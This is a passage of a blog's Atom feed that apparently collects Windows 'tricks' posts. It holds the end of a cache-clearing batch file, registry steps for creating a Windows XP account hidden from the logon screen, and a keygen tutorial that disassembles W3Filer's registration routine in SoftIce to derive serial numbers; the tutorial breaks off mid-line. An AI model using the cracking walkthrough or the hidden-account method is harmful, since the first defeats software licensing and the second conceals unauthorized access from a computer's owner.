Settings\History\History.ie5"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;REM ** Do more stuff here **&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;REM ** Blah, blah, blah......**&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;:end&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;exit&lt;/span&gt;&lt;br /&gt;__________________________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;save above code as anything.bat and run&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2871059245333787304?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2871059245333787304/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/clear-your-pc-using-batch-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2871059245333787304'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2871059245333787304'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/clear-your-pc-using-batch-files.html' title='CLEANYOUR PC USING BATCH FILES'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2065610697873649545</id><published>2010-07-31T14:26:00.000-07:00</published><updated>2010-07-31T14:27:05.616-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>CREATE HIDDEN ACCOUNT IN WINDOWS XP</title><content type='html'>Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further.&lt;br /&gt;After you have Backed up your registry follow the Steps to Create your Hidden Account:&lt;br /&gt;First Goto Start -&gt; Run -&gt; Type regedit -&gt; Enter&lt;br /&gt;In the Left Menu goto,&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu rrentVersion\Winlogon\SpecialAccounts\UserList&lt;br /&gt;&lt;br /&gt;In the Right pane, Right click -&gt; New -&gt; String Value&lt;br /&gt;Right click on the new String Value and click Rename&lt;br /&gt;Type the Name of the Account you want to hide.&lt;br /&gt;Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.&lt;br /&gt;Now Save and Exit the Registry and Logoff.&lt;br /&gt;Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt&lt;br /&gt;Type hidden Accounts name and password&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2065610697873649545?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2065610697873649545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/07/create-hidden-account-in-windows-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2065610697873649545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2065610697873649545'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/07/create-hidden-account-in-windows-xp.html' title='CREATE HIDDEN ACCOUNT IN WINDOWS XP'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4542840326530300422</id><published>2010-07-31T14:22:00.000-07:00</published><updated>2010-07-31T14:23:16.208-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='keygen'/><title type='text'>HOW TO MAKE KEYGEN</title><content type='html'>Hi there, in this tutorial, I intend to teach you how to make a pretty&lt;br /&gt;simple keygen, of a program called W3Filer 32 V1.1.3.&lt;br /&gt;W3Filer is a pretty good web downloader...&lt;br /&gt;I guess some of you might know the program.&lt;br /&gt;I`ll assume you know:&lt;br /&gt;A.How to use debugger (in this case, SoftIce).&lt;br /&gt;B.How to crack, generally (finding protection routines,patching them,etc...).&lt;br /&gt;C.How to use Disassembler (This knowledge can help).&lt;br /&gt;D.Assembly.&lt;br /&gt;E.How to code in Turbo Pascal ™.&lt;br /&gt;Tools you`ll need:&lt;br /&gt;A.SoftIce 3.00/01 or newer.&lt;br /&gt;B.WD32Asm. (Not a must).&lt;br /&gt;C.The program W3Filer V1.13 (if not provided in this package), can be found in&lt;br /&gt;www.windows95.com I believe.&lt;br /&gt;D.Turbo Pascal (ANY version).&lt;br /&gt;Well, enough blah blah, let's go cracking...&lt;br /&gt;Run W3Filer 32.&lt;br /&gt;A nag screen pops, and , demands registration (Hmm, this sux Cheesy Now,&lt;br /&gt;We notice this program has some kind of serial number (Mine is 873977046),&lt;br /&gt;Let's keep the serial in mind, I bet we`ll meet it again while we're on&lt;br /&gt;the debugger.&lt;br /&gt;Well, now, let's put your name and a dummy reg code...&lt;br /&gt;set a BP on GetDlgItemTextA, and, press OK.&lt;br /&gt;We pop inside GetDlgItemTextA, Lets find the registration routine...&lt;br /&gt;I`ll save you the work, the registration routine is this:&lt;br /&gt;:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]&lt;br /&gt;:00404DB8 52 push edx ---&gt; Your user name here.&lt;br /&gt;:00404DB9 E80B550000 call 0040A2C9 ---&gt; Registration routine.&lt;br /&gt;:00404DBE 83C408 add esp, 00000008 ---&gt; Dunno exactly what is it.&lt;br /&gt;:00404DC1 85C0 test eax, eax ---&gt; Boolean identifier, 0 if&lt;br /&gt;:00404DC3 7D17 jge 00404DDC ---&gt; registration failed, 1 if&lt;br /&gt;OK.&lt;br /&gt;Well, Let's enter the CALL 40A2C9, and see what's inside it:&lt;br /&gt;(Please read my comments in the code).&lt;br /&gt;* Referenced by a CALL at Addresses:&lt;br /&gt;|:00404DB9 , :00407F76&lt;br /&gt;|&lt;br /&gt;:0040A2C9 55 push ebp&lt;br /&gt;:0040A2CA 8BEC mov ebp, esp&lt;br /&gt;:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0&lt;br /&gt;:0040A2D2 53 push ebx&lt;br /&gt;:0040A2D3 56 push esi&lt;br /&gt;:0040A2D4 57 push edi&lt;br /&gt;:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]&lt;br /&gt;:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]&lt;br /&gt;:0040A2DE 33C0 xor eax, eax&lt;br /&gt;:0040A2E0 EB16 jmp 0040A2F8&lt;br /&gt;* Referenced by a (U)nconditional or ©onditional Jump at Address:&lt;br /&gt;|:0040A2FB©&lt;br /&gt;|&lt;br /&gt;:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----&gt; Here Starts the&lt;br /&gt;interesting part.&lt;br /&gt;:0040A2E5 83F920 cmp ecx, 00000020 ----&gt; ECX is the the current&lt;br /&gt;char in the user name, Hmm, 20h=' '...&lt;br /&gt;:0040A2E8 740D je 0040A2F7 ----&gt; Let's see,&lt;br /&gt;:0040A2EA 8A0A mov cl, byte ptr [edx] ----&gt; Generally, all this loop&lt;br /&gt;does, is copying&lt;br /&gt;the user name from&lt;br /&gt;[EDX], to [ESI], WITHOUT the spaces!&lt;br /&gt;(Keep this in mind! ).&lt;br /&gt;:0040A2EC 880C06 mov byte ptr [esi+eax], cl&lt;br /&gt;:0040A2EF 42 inc edx&lt;br /&gt;:0040A2F0 40 inc eax&lt;br /&gt;:0040A2F1 C6040600 mov byte ptr [esi+eax], 00&lt;br /&gt;:0040A2F5 EB01 jmp 0040A2F8&lt;br /&gt;* Referenced by a (U)nconditional or ©onditional Jump at Address:&lt;br /&gt;|:0040A2E8©&lt;br /&gt;|&lt;br /&gt;:0040A2F7 42 inc edx&lt;br /&gt;* Referenced by a (U)nconditional or ©onditional Jump at Addresses:&lt;br /&gt;|:0040A2E0(U), :0040A2F5(U)&lt;br /&gt;|&lt;br /&gt;:0040A2F8 803A00 cmp byte ptr [edx], 00&lt;br /&gt;:0040A2FB 75E5 jne 0040A2E2 ----------------&gt; This is the loop , we got&lt;br /&gt;what it does,&lt;br /&gt;Let's continue tracing&lt;br /&gt;the code...&lt;br /&gt;:0040A2FD 56 push esi --------&gt; The user name is pushed, in order&lt;br /&gt;to&lt;br /&gt;Upcase it's chars.&lt;br /&gt;* Reference To: USER32.CharUpperA, Ord:0000h&lt;br /&gt;|&lt;br /&gt;:0040A2FE E80F330000 Call User!CharUpper ---&gt; After this, our name is in&lt;br /&gt;upper case.&lt;br /&gt;:0040A303 56 push esi -----&gt; Our name in upper case here.&lt;br /&gt;* Reference To: cw3220mt._strlen, Ord:0000h&lt;br /&gt;|&lt;br /&gt;:0040A304 E86F300000 Call 0040D378 ---&gt; This is the length of our name.&lt;br /&gt;:0040A309 59 pop ecx&lt;br /&gt;:0040A30A 8BC8 mov ecx, eax ---&gt; ECX=Length.&lt;br /&gt;:0040A30C 83F904 cmp ecx, 00000004 ---&gt; Length&gt;=4 (MUST).&lt;br /&gt;:0040A30F 7D05 jge 0040A316 ---&gt; Let's go to this address...&lt;br /&gt;:0040A311 83C8FF or eax, FFFFFFFF&lt;br /&gt;:0040A314 EB67 jmp 0040A37D&lt;br /&gt;* Referenced by a (U)nconditional or ©onditional Jump at Address:&lt;br /&gt;|:0040A30F©&lt;br /&gt;|&lt;br /&gt;:0040A316 33D2 xor edx, edx&lt;br /&gt;:0040A318 33C0 xor eax, eax&lt;br /&gt;:0040A31A 3BC8 cmp ecx, eax&lt;br /&gt;:0040A31C 7E17 jle 0040A335 ---&gt; (Not important, just another useless&lt;br /&gt;checking).&lt;br /&gt;===================================================================================&lt;br /&gt;============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================&lt;br /&gt;===================================================================================&lt;br /&gt;One thing before we continue, EDX = 00000000h as we enter to the next instructions.&lt;br /&gt;* Referenced by a (U)nconditional or ©onditional Jump at Address:&lt;br /&gt;|:0040A333©&lt;br /&gt;|&lt;br /&gt;:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---&gt; EBX &lt;--- char in user&lt;br /&gt;name, offset EAX.&lt;br /&gt;:0040A322 C1E303 shl ebx, 03 -----&gt; Hmm, it shl's the char by 03h...&lt;br /&gt;(Remember that).&lt;br /&gt;:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---&gt; Now EDI &lt;--- Char in&lt;br /&gt;user name , offset EAX.&lt;br /&gt;:0040A329 0FAFF8 imul edi, eax -----&gt; It multiplies the char by the&lt;br /&gt;offset in user name! (Remember that).&lt;br /&gt;:0040A32C 03DF add ebx, edi -----&gt; Adds the result to EBX (That was&lt;br /&gt;S
